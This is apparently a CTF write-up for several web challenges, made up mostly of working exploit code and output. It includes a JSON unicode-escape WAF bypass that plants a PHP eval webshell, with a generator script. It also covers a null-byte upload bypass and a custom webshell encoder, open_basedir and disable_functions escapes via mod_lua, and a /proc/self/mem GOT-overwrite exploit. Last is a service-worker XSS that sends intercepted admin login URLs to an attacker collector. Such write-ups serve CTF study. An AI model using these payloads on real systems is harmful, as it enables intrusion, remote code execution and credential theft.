Preface
A web player who can't do binary really gets beaten up at any moment.

easyjson
Web sign-in (warm-up) challenge. The source:
```php
<?php
include 'security.php';
if (!isset($_GET['source'])) {
    show_source(__FILE__);
    die();
}
$sandbox = 'sandbox/' . sha1($_SERVER['HTTP_X_FORWARDED_FOR']) . '/';
var_dump($sandbox);
if (!file_exists($sandbox)) {
    mkdir($sandbox);
    file_put_contents($sandbox . "index.php", "<?php echo 'Welcome To Dbapp OSS.';?>");
}
$action = $_GET['action'];
$content = file_get_contents("php://input");
// SecurityCheck() runs on the raw request body, before json_decode() interprets it.
if ($action == "write" && SecurityCheck('filename', $_GET['filename']) && SecurityCheck('content', $content)) {
    $content = json_decode($content);
    $filename = $_GET['filename'];
    $filecontent = $content->content;
    $filename = $sandbox . $filename;
    file_put_contents($filename, $filecontent . "\n Powered By Dbapp OSS.");
} elseif ($action == "reset") {
    $files = scandir($sandbox);
    foreach ($files as $file) {
        if (!is_dir($file)) {
            if ($file !== "index.php") {
                unlink($sandbox . $file);
            }
        }
    }
} else {
    die('Security Check Failed.');
}
```
json_decode() turns \uXXXX escapes in the JSON text back into the characters they stand for, while SecurityCheck() only ever sees the raw body. Any keyword the WAF looks for can therefore be split with an escape: the check passes on the raw text, and the decoder reassembles the key name and the PHP open tag afterwards:

```json
{"c\u006fntent":"<?ph\u0070 @eval($_POST[x]); ?>"}
```
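The same idea generalised, as an added example that is not part of the writeup: a small JavaScript helper takes the object to send plus a keyword blacklist standing in for the unseen SecurityCheck() (security.php is not shown on the page, so the keywords are an assumption), escapes the first character of every keyword hit as \uXXXX, and then verifies both that a naive substring WAF no longer matches the raw text and that the JSON decoder still yields the original object.

```javascript
'use strict';

// Constructed blacklist standing in for the challenge's SecurityCheck();
// security.php is not shown, so these keywords are an assumption.
const BLACKLIST = ['php', 'content', 'eval', 'system'];

// Stand-in WAF: case-insensitive substring match on the *raw* request body,
// i.e. on the text before json_decode() has interpreted any escapes.
function naiveCheck(raw, blacklist = BLACKLIST) {
  const lower = raw.toLowerCase();
  return blacklist.every((w) => !lower.includes(w.toLowerCase()));
}

// JSON \uXXXX escape for one character (JSON only allows 4-hex-digit escapes).
function uEscape(ch) {
  return '\\u' + ch.charCodeAt(0).toString(16).padStart(4, '0');
}

// Escape the first character of every keyword occurrence in the JSON text.
// Keys and values are both string literals, so the escape is always legal JSON.
function breakKeywords(text, blacklist) {
  let out = text;
  for (const w of blacklist) {
    const re = new RegExp(w.replace(/[.*+?^${}()|[\]\\]/g, '\\$&'), 'gi');
    out = out.replace(re, (m) => uEscape(m[0]) + m.slice(1));
  }
  return out;
}

// Serialise obj so that no blacklisted keyword survives as a plain substring,
// while JSON.parse() (and PHP's json_decode()) still recover the original object.
function buildBypassBody(obj, blacklist = BLACKLIST) {
  let raw = JSON.stringify(obj);
  // Loop a few times in case one replacement exposes another keyword.
  for (let i = 0; i < 5 && !naiveCheck(raw, blacklist); i++) {
    raw = breakKeywords(raw, blacklist);
  }
  if (!naiveCheck(raw, blacklist)) throw new Error('could not hide every keyword');
  if (JSON.stringify(JSON.parse(raw)) !== JSON.stringify(obj)) throw new Error('round-trip mismatch');
  return raw;
}

// Example run with the writeup's shell as the value.
const PAYLOAD = { content: '<?php @eval($_POST[x]); ?>' };
console.log(buildBypassBody(PAYLOAD));
```

Only the first character of each hit is escaped, which keeps the body short; escaping every character would work just as well against a substring filter, but a WAF that decodes JSON (or simply rejects bodies containing `\u`) defeats both variants, so the check is only ever as good as the decoder it sees.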
newupload
File upload behind the 宝塔 (BT) WAF. The WAF is bypassed by putting %00 in front of the file content:

```http
-----------------------------25915315562572954365101207558
Content-Disposition: form-data; name="file"; filename="1.p h p"
Content-Type: image/jpeg

%00
<?php phpinfo(); ?>
-----------------------------25915315562572954365101207558--
```
Upload a webshell. Because of the WAF, the webshell traffic is recognised and AntSword cannot connect to it directly, so an encoder is needed to get past it; AntSword's built-in encoders are useless here. A custom one:

```javascript
'use strict';
// AntSword custom encoder: base64 the request payload and send it directly under
// the shell's password parameter instead of in clear text.
module.exports = (pwd, data, ext = {}) => {
  data[pwd] = Buffer.from(data['_']).toString('base64');
  delete data['_'];
  return data;
};
```

Since the payload now arrives base64-encoded under the password parameter, this only works with a shell that decodes its input itself, e.g. eval(base64_decode($_POST['x'])); a plain eval($_POST['x']) would try to execute the base64 text.
After that AntSword connects. phpinfo shows that open_basedir and disable_functions are set, and /readflag sits in the filesystem root, so both restrictions need to be bypassed in order to execute /readflag.

open_basedir bypass

```php
<?php
chdir("/tmp/btwaf");
ini_set("open_basedir", "..");
chdir(".."); chdir(".."); chdir(".."); chdir(".."); chdir("..");
ini_set("open_basedir", "/");
var_dump(scandir("/"));
```

This works because PHP only checks that a new open_basedir value lies inside the current one, and a relative value such as .. is resolved against the current working directory each time it is checked: once the cwd has been walked up to /, .. resolves to / as well, and setting open_basedir to / passes the check.
lua bypass
The target's Apache has the Lua module loaded, so a Lua script can be uploaded and run by httpd itself, outside PHP's disable_functions.

exp.lua

```lua
require "string"

function handle(r)
    r.content_type = "text/plain"
    -- io.popen runs in the httpd process, so PHP's disable_functions do not apply
    local t = io.popen('/readflag')
    local a = t:read("*all")
    t:close()
    r:puts(a)
end
```

.htaccess (maps .lua files in that directory to mod_lua)

```apache
AddHandler lua-script lua
```
php-fpm bypass
The FastCGI socket path is unix:///tmp/php-cgi-74.sock. AntSword's built-in plugin can attack php-fpm over it, but the WAF drops long HTTP requests, which makes the exploit fail, so a teammate modified the plugin to send the payload in segments:
https://github.com/chuochuodragon/as_bypass_php_disable_functions
flagshop
A bare file read and a bare file write; the flag itself cannot be read.

backend.php

```php
<?php
$offset = isset($_GET['offset']) ? $_GET['offset'] : 0;
$buffer = isset($_GET['buffer']) ? $_GET['buffer'] : "";
if (isset($_GET['writefile'])) {
    $fp = fopen($_GET['writefile'], "a");
    fseek($fp, $offset);
    fwrite($fp, $buffer);
    fclose($fp);
}
if (isset($_GET['readfile'])) {
    echo file_get_contents($_GET['readfile']);
}
```
What follows is the more binary-flavoured part. /proc/self/maps shows the memory layout of the process and /proc/self/mem lets you write to that memory, so the arbitrary write becomes a patch of the running php-fpm worker. The goal is to overwrite the GOT entry of open(), which file_get_contents() calls with the path it is given, with the address of system(), so that the "file name" passed to readfile is executed as a shell command. The script below does exactly this:
https://github.com/beched/php_disable_functions_bypass/blob/master/procfs_bypass.php
The script needs one fix for this target: the address to write is open@plt itself, not PIE base + open@plt, because this php binary is not position independent (its base is the fixed 0x400000), so the address read from the ELF is already absolute. Its output:

```
Got PIE base: 0x400000
Offset is 0xe9f998
Libc location: /lib/x86_64-linux-gnu/libc-2.19.so
libc start: 0x7ffff5f40000
_system offset: 0x46590
open@plt = 0xe9f998 (dec 15333784)
libc_start + _system offset = 0x7ffff5f86590 (urlencode %90e%F8%F5%FF%7F%00%00)
```

backend.php handles writefile before readfile, so a single request both patches the GOT slot and triggers the call; the command's output is written to a file that can then be read back:

```
backend.php?readfile=/bin/bash+-c+"/readflag+>+/tmp/fuck"&writefile=/proc/self/mem&buffer=%90e%F8%F5%FF%7F%00%00&offset=15333784
```
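The address arithmetic behind that request, as an added example in JavaScript (not the writeup's or beched's code): it parses a constructed /proc/self/maps excerpt carrying the same addresses the writeup printed, adds the system offset to the libc base, packs the result little-endian, URL-encodes it the way the writeup did, and assembles the backend.php request. The GOT slot address (0xe9f998) and the libc-2.19 system offset (0x46590) are taken from the output above as inputs, not derived; the output file name is a placeholder.

```javascript
'use strict';

// Constructed /proc/self/maps excerpt. The addresses are the ones the writeup
// printed (php-fpm at 0x400000, libc-2.19 at 0x7ffff5f40000); the rest is filler.
const SAMPLE_MAPS = [
  '00400000-01296000 r-xp 00000000 08:01 1234 /usr/local/sbin/php-fpm',
  '01495000-0152c000 rw-p 00e95000 08:01 1234 /usr/local/sbin/php-fpm',
  '7ffff5f40000-7ffff60fb000 r-xp 00000000 08:01 5678 /lib/x86_64-linux-gnu/libc-2.19.so',
  '7ffff60fb000-7ffff62fa000 ---p 001bb000 08:01 5678 /lib/x86_64-linux-gnu/libc-2.19.so',
  '7ffff62fa000-7ffff62fe000 r--p 001ba000 08:01 5678 /lib/x86_64-linux-gnu/libc-2.19.so',
  '7ffff62fe000-7ffff6300000 rw-p 001be000 08:01 5678 /lib/x86_64-linux-gnu/libc-2.19.so',
].join('\n');

// One maps line -> { start, end, perms, path } with BigInt addresses.
function parseMaps(text) {
  return text.split('\n').filter((l) => l.trim()).map((line) => {
    const f = line.trim().split(/\s+/);
    const [start, end] = f[0].split('-').map((h) => BigInt('0x' + h));
    return { start, end, perms: f[1], path: f[5] || '' };
  });
}

// libc base = start of its first executable mapping (file offset 0).
function findLibcBase(maps) {
  const m = maps.find((e) => /\/libc[-.]/.test(e.path) && e.perms.startsWith('r-x'));
  if (!m) throw new Error('libc not found in maps');
  return m.start;
}

// 64-bit value as 8 little-endian bytes, the layout of a GOT slot on x86-64.
function packLE64(addr) {
  const out = [];
  for (let i = 0n; i < 8n; i++) out.push(Number((addr >> (8n * i)) & 0xffn));
  return out;
}

// Percent-encode bytes for the buffer= parameter. Unreserved bytes stay literal
// (0x65 becomes "e", as in the writeup), everything else becomes %XX.
function urlencodeBytes(bytes) {
  return bytes.map((b) => {
    const c = String.fromCharCode(b);
    return /[A-Za-z0-9\-_.~]/.test(c) ? c : '%' + b.toString(16).toUpperCase().padStart(2, '0');
  }).join('');
}

// Assemble the single request: backend.php handles writefile before readfile, so the
// GOT slot of open() is patched first and file_get_contents() -> open() lands in system().
function buildExploitUrl({ maps, gotSlot, systemOffset, cmd, outFile }) {
  const systemAddr = findLibcBase(parseMaps(maps)) + systemOffset;
  const buffer = urlencodeBytes(packLE64(systemAddr));
  const readfile = encodeURIComponent(`/bin/bash -c "${cmd} > ${outFile}"`);
  const url = `backend.php?readfile=${readfile}&writefile=/proc/self/mem` +
    `&buffer=${buffer}&offset=${gotSlot.toString()}`;
  return { systemAddr, buffer, url };
}

// Inputs taken from the writeup's output: open@plt GOT slot and libc-2.19 system offset.
const EXAMPLE = buildExploitUrl({
  maps: SAMPLE_MAPS,
  gotSlot: 0xe9f998n,       // printed as "Offset is 0xe9f998"
  systemOffset: 0x46590n,   // "_system offset: 0x46590"
  cmd: '/readflag',
  outFile: '/tmp/out',      // placeholder output path
});
console.log('system @ 0x' + EXAMPLE.systemAddr.toString(16), EXAMPLE.buffer);
console.log(EXAMPLE.url);
```

The command part is encoded with encodeURIComponent here, whereas the writeup used + for spaces and literal quotes; PHP's $_GET accepts both. Against a real target, maps must of course be read through the same readfile primitive (readfile=/proc/self/maps) rather than from a constant, and the libc offset must match the library actually mapped.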
hardxss
Use a service worker to make the XSS persistent. The challenge has two domains:

XSS point: https:
JSONP point (Content-Type is text/javascript): https:

Register the service worker. The JSONP endpoint echoes the callback name with a JavaScript content type, so its response is accepted as the worker script and simply pulls in the attacker's script (evil_server.js stands for the attacker-hosted worker):

```javascript
navigator.serviceWorker.register("https://auth.hardxss.xhlj.wetolink.com/api/loginStatus?callback=importScripts(`evil_server.js`);//")
```
Cross-origin operation via an iframe and document.domain. Both windows have to relax their origin to the same parent domain (the framed auth page must set document.domain as well); the registration call is then run inside the auth origin's window, which is the only origin allowed to register a worker for it, and a worker script under /api/ gets /api/ as its scope, which covers /api/loginVerify:

```javascript
document.domain = "hardxss.xhlj.wetolink.com";
var iff = document.createElement("iframe");
iff.src = "https://auth.hardxss.xhlj.wetolink.com/";
exp = `navigator.serviceWorker.register("https://auth.hardxss.xhlj.wetolink.com/api/loginStatus?callback=importScripts('evil_server.js');//")`;
function iffloader() {
  // eval in the framed window so the registration happens on the auth origin
  iff.contentWindow.eval(exp);
}
iff.addEventListener("load", function () {
  iffloader();
});
document.body.appendChild(iff);
```
The evil service worker: it intercepts requests to loginVerify and answers them with a page that sends the intercepted URL (base64) to the attacker's collector.

```javascript
self.addEventListener('fetch', function (event) {
  var url = event.request.clone();
  var init = { headers: { 'Content-Type': 'text/html' } };
  var body = '<script>fetch("recive_server?' + btoa(url.url) + '").then(function(res){console.log(res)})</script>';
  if (url.url.startsWith("https://auth.hardxss.xhlj.wetolink.com/api/loginVerify")) {
    var res = new Response(body, init);
    event.respondWith(res.clone());
  }
});
```
Finally submit the page to the admin, collect the account and password, log in and the flag is displayed. Tested successfully locally.
DiscuzQ!
This one is a bit absurd; see the challenge author's blog instead: https://www.zhaoj.in/read-6681.html